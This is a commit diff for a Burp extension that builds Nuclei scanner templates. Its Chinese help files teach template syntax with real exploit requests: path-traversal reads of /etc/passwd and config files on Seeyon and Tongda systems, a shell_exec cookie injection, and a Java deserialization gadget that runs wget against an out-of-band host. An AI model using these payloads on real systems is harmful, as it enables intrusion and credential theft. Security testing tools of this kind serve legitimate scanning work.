update 2023年 4月13日 星期四 17时30分36秒 CST

.gitignore

@@ -0,0 +1,4 @@
+**/.DS_Store
+.idea
+/target
+push.sh

help1.txt

@@ -0,0 +1,168 @@
+官方文档 : https://nuclei.projectdiscovery.io/templating-guide
+
+nuclei 2.9.1 更新把模版格式改变了，后续nuclei版本要大于等于 291 不然可能解析不了模版格式
+- https://github.com/projectdiscovery/nuclei/releases/tag/v2.9.1
+- https://github.com/projectdiscovery/nuclei/issues/3055
+
+----------------------------分割线----------------------------
+
+Get : 发送一个GET请求
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
+
+----------------------------分割线----------------------------
+
+POST : 发送一个POST请求
+http:
+ - method: POST
+ path:
+ - "{{BaseURL}}/sys/ui/extend/varkind/custom.jsp"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+ body: 'var={"body":{"file":"file:https:///etc/passwd"}}'
+
+----------------------------分割线----------------------------
+
+RAW : 解析 raw 格式请求
+http:
+ - raw:
+ - |
+ POST /ispirit/interface/gateway.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ json={"url":"/general/../../mysql5/my.ini"}
+
+----------------------------分割线----------------------------
+
+stop-at-first-match : 大意就是一个模板里有多个扫描路径,当第一个命中时,自动停止后面几个路径的扫描,当然这个不会影响其他模板.
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ - "{{BaseURL}}/login"
+ - "{{BaseURL}}/main"
+ - "{{BaseURL}}/index"
+
+ stop-at-first-match: true
+
+----------------------------分割线----------------------------
+
+OOB : 自 Nuclei v2.3.6 发行以来，Nuclei 支持使用 interact.sh API 内置自动请求关联来实现基于 OOB 的漏洞扫描。
+http:
+ - raw:
+ - |
+ GET /plugins/servlet/oauth/users/icon-uri?consumerUri={{interactsh-url}} HTTP/1.1
+ Host: {{Hostname}}
+
+----------------------------分割线----------------------------
+
+JAVA反序列化 : https://nuclei.projectdiscovery.io/templating-guide/helper-functions/#deserialization-helper-functions
+raw:
+ - |
+ POST /index.faces;jsessionid=x HTTP/1.1
+ Host: {{Hostname}}
+ Accept-Encoding: gzip, deflate
+ Content-Length: 1882
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Connection: close
+ Content-Type: application/x-www-form-urlencoded
+
+ javax.faces.ViewState={{generate_java_gadget("commons-collections3.1", "wget http:https://{{interactsh-url}}", "base64")}}
+
+----------------------------分割线----------------------------
+
+skip-variables-check : 当你的请求内容里包含 {{ 时,会被 nuclei 解析为变量,加这个就是告诉nuclei不要解析.
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ headers:
+ Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
+
+ skip-variables-check: true
+
+----------------------------分割线----------------------------
+
+嵌套表达式
+❌ {{url_decode({{base64_decode('SGVsbG8=')}})}}
+✔ {{url_decode(base64_decode('SGVsbG8='))}}
+
+如果需要在 extractor 中使用,比如将 extractor 提取的变量值 test 进行处理
+{{url_decode(base64_decode('{{test}}'))}}
+
+----------------------------分割线----------------------------
+
+自定义模版变量 : 自 2.6.9 版本开始支持
+variables:
+ a1: "{{to_lower(rand_base(5))}}"
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?test={{a1}}"
+
+ matchers:
+ - type: word
+ words:
+ - "{{a1}}"
+
+----------------------------分割线----------------------------
+
+self-contained : 这个用的比较局限,一般就是用于批量检测 API 可用性的,举个例子,你通过信息泄露获得了一个 API_Key 但你不知道这个是哪个服务的 APIkey,没有特征,那么就只能找哪些官方API接口一个一个试,看哪一个平台可以生效,就是这个意思。
+id: example-self-contained-input
+
+info:
+ name: example-self-contained
+ author: pdteam
+ severity: info
+
+self-contained: true
+http:
+ - raw:
+ - |
+ GET https://example.com:443/gg HTTP/1.1
+ Host: example.com:443
+
+----------------------------分割线----------------------------
+
+文件协议 : 文件模板默认读取的文件大小1GB
+file:
+ - extensions:
+ - all
+
+ extractors:
+ - type: regex
+ regex:
+ - '"type": "service_account"'
+
+----------------------------分割线----------------------------
+
+网络层
+tcp:
+ - host:
+ - '{{Hostname}}'
+ - '{{Host}}:22'
+
+ inputs:
+ - data: "\n"
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'SSH\-([0-9.-A-Za-z_ ]+)'
+
+----------------------------分割线----------------------------
+
+读取大小
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/thumbs.db"
+ - "{{BaseURL}}/.svn/wc.db"
+
+ max-size: 500 # Size in bytes - Max Size to read from server response

help2.txt

@@ -0,0 +1,66 @@
+https://nuclei.projectdiscovery.io/templating-guide/helper-functions/
+{{Hostname}}
+{{randstr}}
+{{BaseURL}} # https://example.com:443/foo/bar.php
+{{RootURL}} # https://example.com:443
+{{Hostname}} # example.com:443
+{{Host}} # example.com
+{{Port}} # 443
+{{Path}} # /foo
+{{File}} # bar.php
+{{Scheme}} # https
+{{FQDN}} # www.projectdiscovery.io
+{{RDN}} # projectdiscovery.io
+{{DN}} # projectdiscovery
+{{TLD}} # io
+{{SD}} # www
+{{base64("Hello")}}
+{{base64(1234)}}
+{{base64_decode("SGVsbG8=")}}
+{{base64_py("Hello")}}
+{{contains("Hello", "lo")}}
+{{generate_java_gadget("commons-collections3.1", "wget {{interactsh-url}}", "base64")}}
+{{gzip("Hello")}}
+{{hex_decode("6161")}}
+{{hex_encode("aa")}}
+{{html_escape("<body>test</body>")}}
+{{html_unescape("&lt;body&gt;test&lt;/body&gt;")}}
+{{len("Hello")}}
+{{len(5555)}}
+{{md5("Hello")}}
+{{md5(1234)}}
+{{mmh3("Hello")}}
+{{print_debug(1+2, "Hello")}}
+{{rand_base(5, "abc")}}
+{{rand_base(5)}}
+{{rand_char("abc")}}
+{{rand_char()}}
+{{rand_int(1, 10)}}
+{{rand_int(10)}}
+{{rand_int()}}
+{{rand_text_alpha(10, "abc")}}
+{{rand_text_alpha(10)}}
+{{rand_text_alphanumeric(10, "ab12")}}
+{{rand_text_alphanumeric(10)}}
+{{rand_text_numeric(10, 123)}}
+{{rand_text_numeric(10)}}
+{{regex("H([a-z]+)o", "Hello")}}
+{{remove_bad_chars("abcd", "bc")}}
+{{repeat("../", 5)}}
+{{replace("Hello", "He", "Ha")}}
+{{replace_regex("He123llo", "(\\d+)", "")}}
+{{reverse("abc")}}
+{{sha1("Hello")}}
+{{sha256("Hello")}}
+{{to_lower("HELLO")}}
+{{to_upper("hello")}}
+{{trim("aaaHelloddd", "ad")}}
+{{trim_left("aaaHelloddd", "ad")}}
+{{trim_prefix("aaHelloaa", "aa")}}
+{{trim_right("aaaHelloddd", "ad")}}
+{{trim_space(" Hello ")}}
+{{trim_suffix("aaHelloaa", "aa")}}
+{{unix_time(10)}}
+{{url_decode("https:%2F%2Fprojectdiscovery.io%3Ftest=1")}}
+{{url_encode("https://projectdiscovery.io/test?a=1")}}
+{{wait_for(1)}}

pom.xml

@@ -0,0 +1,73 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http:https://maven.apache.org/POM/4.0.0"
+ xmlns:xsi="http:https://www.w3.org/2001/XMLSchema-instance"
+ xsi:schemaLocation="http:https://maven.apache.org/POM/4.0.0 http:https://maven.apache.org/xsd/maven-4.0.0.xsd">
+ <modelVersion>4.0.0</modelVersion>
+
+ <groupId>net.test</groupId>
+ <artifactId>Nu_Te_Gen</artifactId>
+ <version>1.3-SNAPSHOT</version>
+
+ <build>
+ <plugins>
+ <plugin>
+ <groupId>org.apache.maven.plugins</groupId>
+ <artifactId>maven-compiler-plugin</artifactId>
+ <configuration>
+ <source>15</source>
+ <target>15</target>
+ </configuration>
+ </plugin>
+
+ <!-- Maven Assembly Plugin -->
+ <plugin>
+ <groupId>org.apache.maven.plugins</groupId>
+ <artifactId>maven-assembly-plugin</artifactId>
+ <version>2.4.1</version>
+ <configuration>
+ <!-- get all project dependencies -->
+ <descriptorRefs>
+ <descriptorRef>jar-with-dependencies</descriptorRef>
+ </descriptorRefs>
+ <!-- MainClass in mainfest make a executable jar -->
+ <archive>
+ <manifest>
+ <mainClass>burp.BurpExtender</mainClass>
+ </manifest>
+ </archive>
+
+ </configuration>
+ <executions>
+ <execution>
+ <id>make-assembly</id>
+ <!-- bind to the packaging phase -->
+ <phase>package</phase>
+ <goals>
+ <goal>single</goal>
+ </goals>
+ </execution>
+ </executions>
+ </plugin>
+
+
+
+
+ </plugins>
+ </build>
+
+
+ <dependencies>
+ <dependency>
+ <groupId>net.portswigger.burp.extender</groupId>
+ <artifactId>burp-extender-api</artifactId>
+ <version>LATEST</version>
+ </dependency>
+ <dependency>
+ <groupId>org.apache.commons</groupId>
+ <artifactId>commons-text</artifactId>
+ <version>1.6</version>
+ </dependency>
+ </dependencies>
+
+
+</project>